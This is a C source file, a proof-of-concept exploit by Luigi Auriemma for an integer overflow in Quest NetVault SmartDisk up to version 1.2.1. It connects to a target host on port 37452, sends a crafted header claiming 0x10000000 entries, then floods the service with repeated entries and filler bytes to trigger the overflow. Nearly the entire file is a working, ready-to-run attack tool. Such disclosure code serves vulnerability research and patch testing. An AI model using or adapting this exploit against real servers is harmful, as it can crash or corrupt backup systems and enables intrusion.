/*
  by Luigi Auriemma
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>
#include <time.h>

#ifdef WIN32
    #include <winsock.h>
    #include "winerr.h"

    #define close   closesocket
    #define sleep   Sleep
    #define ONESEC  1000
#else
    #include <unistd.h>
    #include <sys/socket.h>
    #include <sys/types.h>
    #include <arpa/inet.h>
    #include <netinet/in.h>
    #include <netdb.h>

    #define ONESEC  1
#endif

typedef uint8_t     u8;
typedef uint16_t    u16;
typedef uint32_t    u32;



#define VER         "0.1"
#define PORT        37452
#define BUFFSZ      0x100000
#define BUG         0x10000000



int putss(u8 *data, u8 *str);
int putmm(u8 *data, u8 *str, int size);
int putxx(u8 *data, u32 num, int bits);
int timeout(int sock, int secs);
u32 resolv(char *host);
void std_err(void);



int main(int argc, char *argv[]) {
    struct  linger  ling = {1,1};
    struct  sockaddr_in peer;
    int     sd,
            i,
            t,
            len;
    u16     port    = PORT;
    u8      *host,
            *buff,
            *p;

#ifdef WIN32
    WSADATA    wsadata;
    WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

    setbuf(stdout, NULL);

    fputs("\n"
        "Quest NetVault SmartDisk <= 1.2.1 integer overflow "VER"\n"
        "by Luigi Auriemma\n"
        "e-mail: aluigi@autistici.org\n"
        "web:    aluigi.org\n"
        "\n", stdout);

    if(argc < 2) {
        printf("\n"
            "Usage: %s <host> [port(%d)]\n"
            "\n", argv[0], port);
        exit(1);
    }

    host = argv[1];
    if(argc > 2) port = atoi(argv[2]);

    peer.sin_addr.s_addr = resolv(host);
    peer.sin_port        = htons(port);
    peer.sin_family      = AF_INET;

    printf("- target   %s : %hu\n",
        inet_ntoa(peer.sin_addr), ntohs(peer.sin_port));

    buff = malloc(BUFFSZ);
    if(!buff) std_err();

    sd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if(sd < 0) std_err();
    setsockopt(sd, SOL_SOCKET, SO_LINGER, (char *)&ling, sizeof(ling));
    if(connect(sd, (struct sockaddr *)&peer, sizeof(struct sockaddr_in)) < 0) std_err();

    len = 3 + (BUG * 2) + 2 + 1;    // should be ok

    printf("- send header\n");
    p = buff;
    p += putxx(p, 4 + 4+1+4+4 + len+0x400,  32);    // packet size (included itself)
    p += putxx(p,     4+1+4+4 + len+0x400,  32);    // message size
    p += putxx(p, 0x01,         8);                 // opcode
    p += putxx(p, 0xc8000000,   32);                // sub-opcode or similar
    p += putxx(p, len,          32);                // size of the entries
    p += putss(p, "ox;");
    send(sd, buff, p - buff, 0);

    printf("- send 0x%08x entries, wait some seconds:\n", BUG);

    /* normal slow solution
    for(i = 0; i < BUG; i++) {   // integer overflow
        if(!(i & 0xffff)) printf("  %08x\r", i);
        send(sd, "S;", 2, 0);
    }
    */

    // fast solution
    t = BUFFSZ / 2;
    p = buff;
    for(i = 0; i < t; i++) {
        p += putmm(p, "i;", 2);
    }
    len = p - buff;
    for(i = 0; (i + t) <= BUG; i += t) {
        printf("  %08x\r", i);
        send(sd, buff, len, 0);
    }
    for(; i < BUG; i++) {
        send(sd, buff, 2, 0);
    }
    send(sd, "i;", 3, 0);   // ebp - 1
    printf("  %08x\n", i + 1);

    // the following data is useless at the moment because not read
    for(i = 0; i < 0x100; i++) {
        send(sd, "AAAA", 4, 0);
    }

    if(!timeout(sd, 3)) {
        len = recv(sd, buff, BUFFSZ, 0);
    }
    close(sd);

    printf("- done\n");
    return(0);
}



int putss(u8 *data, u8 *str) {
    int     len;
    u8      *p;

    len = 0;
    if(str) len = strlen(str);
    p = data;
    p += putmm(p, str, len);
    return(p - data);
}



int putmm(u8 *data, u8 *str, int size) {
    if(size < 0) size = strlen(str);
    memcpy(data, str, size);
    return(size);
}



int putxx(u8 *data, u32 num, int bits) {
    int     i,
            bytes;

    bytes = bits >> 3;
    for(i = 0; i < bytes; i++) {
        //data[i] = num >> ((bytes - 1 - i) << 3);
        data[i] = num >> (i << 3);
    }
    return(bytes);
}



int timeout(int sock, int secs) {
    struct  timeval tout;
    fd_set  fd_read;

    tout.tv_sec  = secs;
    tout.tv_usec = 0;
    FD_ZERO(&fd_read);
    FD_SET(sock, &fd_read);
    if(select(sock + 1, &fd_read, NULL, NULL, &tout)
      <= 0) return(-1);
    return(0);
}



u32 resolv(char *host) {
    struct  hostent *hp;
    u32     host_ip;

    host_ip = inet_addr(host);
    if(host_ip == INADDR_NONE) {
        hp = gethostbyname(host);
        if(!hp) {
            printf("\nError: Unable to resolv hostname (%s)\n", host);
            exit(1);
        } else host_ip = *(u32 *)hp->h_addr;
    }
    return(host_ip);
}



#ifndef WIN32
    void std_err(void) {
        perror("\nError");
        exit(1);
    }
#endif

